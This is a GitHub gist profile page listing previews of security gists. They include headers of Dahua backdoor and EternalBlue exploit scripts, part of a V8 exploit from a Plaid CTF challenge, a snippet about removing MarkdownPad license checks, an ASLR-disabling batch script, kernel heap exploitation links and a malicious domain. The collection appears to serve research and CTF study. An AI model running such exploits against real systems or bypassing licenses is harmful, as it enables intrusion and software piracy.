Skip to content

Instantly share code, notes, and snippets.

View huyna's full-sized avatar

huyna

7 followers · 5 following
View GitHub Profile
@huyna
huyna / dahua-backdoor.py
Created November 16, 2017 01:14 — forked from cre8tions/dahua-backdoor.py
dahua exploit poc
#!/usr/bin/python2.7
#
# Dahua backdoor Generation 2 and 3
# Author: bashis <mcw noemail eu> March 2017
#
# Credentials: No credentials needed (Anonymous)
#Jacked from git history
#
import string
@huyna
huyna / eternalblue8_exploit.py
Created May 18, 2017 01:50 — forked from worawit/eternalblue8_exploit.py
Eternalblue exploit for Windows 8/2012
#!/usr/bin/python
from impacket import smb
from struct import pack
import os
import sys
import socket
'''
EternalBlue exploit for Windows 8 and 2012 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)
@huyna
huyna / eternalblue_exploit.py
Created May 16, 2017 07:59 — forked from worawit/eternalblue7_exploit.py
#!/usr/bin/python
from impacket import smb
from struct import pack
import os
import sys
import socket
'''
EternalBlue exploit by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)
@huyna
huyna / js_sandbox.js
Created April 26, 2017 02:00 — forked from sroettger/js_sandbox.js
Exploit for the js_sandbox challenge of Plaid CTF 2016
with (true) {
// f() will allocate a buggy JSArray. The length is set to 24 but the capacity is only 16.
// take a look at JSCreateLowering::ReduceJSCreateArray to see why this is happening
function f(){
var x = 8;
var y = 0xffffffff;
var ind = x & y;
x = 16;
y = 0xffffffff;
var ind2 = ind + (x&y);
@huyna
huyna / Change Post-Mortem Debugger
Created August 31, 2016 15:39
Click "Start" and "Run."
Type "regedit" without the quotation marks to open the registry editor.
Expand "HKEY_LOCAL_MACHINE" and go to "Software." Click on "Microsoft, "WindowsNT," "Current Version" and "AeDebug."
Double-click the registry key "Debugger" on the right-window pane.
Change the entry to "drwtsn32 -p %ld -e %ld -g" -- including the quotation marks -- to change the post-mortem debugger back to its default.
Click "OK" and close the registry editor.
@huyna
huyna / LicenseEngine.cs
Created March 23, 2016 22:18 — forked from gythialy/LicenseEngine.cs
remove license validation of MarkdownPad 2 by Mono Cecil
public bool VerifyLicense(string licenseKey, string email)
{
if (string.IsNullOrEmpty(licenseKey) || string.IsNullOrEmpty(email))
{
return false;
}
try
{
this.License = this.Decrypt(licenseKey);
this.LicenseProcessed = true;
@huyna
huyna / slab slub
Last active April 13, 2023 14:42
http://phrack.org/issues/64/6.html
https://loccs.sjtu.edu.cn/~romangol/download/papers/gossip_ccs2015.pdf
http://resources.infosecinstitute.com/exploiting-linux-kernel-heap-corruptions-slub-allocator/
http://www.slideshare.net/nullthreat/fund-linux-priv-esc-wprotections
http://www.slideshare.net/sciosecurity/linux-kernel-exploitation
http://events.linuxfoundation.org/sites/events/files/slides/slaballocators.pdf
https://github.com/xairy/kaslr-bypass-via-prefetch
http://www.jikos.cz/jikos/Kmalloc_Internals.html
https://github.com/Fuzion24/AndroidKernelExploitationPlayground
http://dcjtech.info/topic/linux-kernel-slab-allocators/
@huyna
huyna / DexGuardDecoder.java
Created March 9, 2016 12:05 — forked from AKosterin/DexGuardDecoder.java
New Dexguard String decoder for JEB 1.5. Tested on GFE 3.1.3. This release auto parse decoder function.
import jeb.api.IScript;
import jeb.api.JebInstance;
import jeb.api.ast.*;
import jeb.api.ast.Class;
import jeb.api.dex.*;
import jeb.api.ui.JavaView;
import jeb.api.ui.View;
import java.util.Arrays;
import java.util.HashMap;
@huyna
huyna / DisableASLR-win10.bat
Last active June 17, 2022 17:41
@ECHO OFF
SETLOCAL
ECHO ASLR Enable / Diable Batch Script - Please run as admin
set /p Choice=Want to Enable or Disable ASLR? (e or d):%=%
if "%Choice%"=="e" goto :ENABLE
if "%Choice%"=="d" goto :DISABLE
:ENABLE
@huyna
huyna / mal-domain
Created March 3, 2016 02:08
az667904.vo.msecnd.net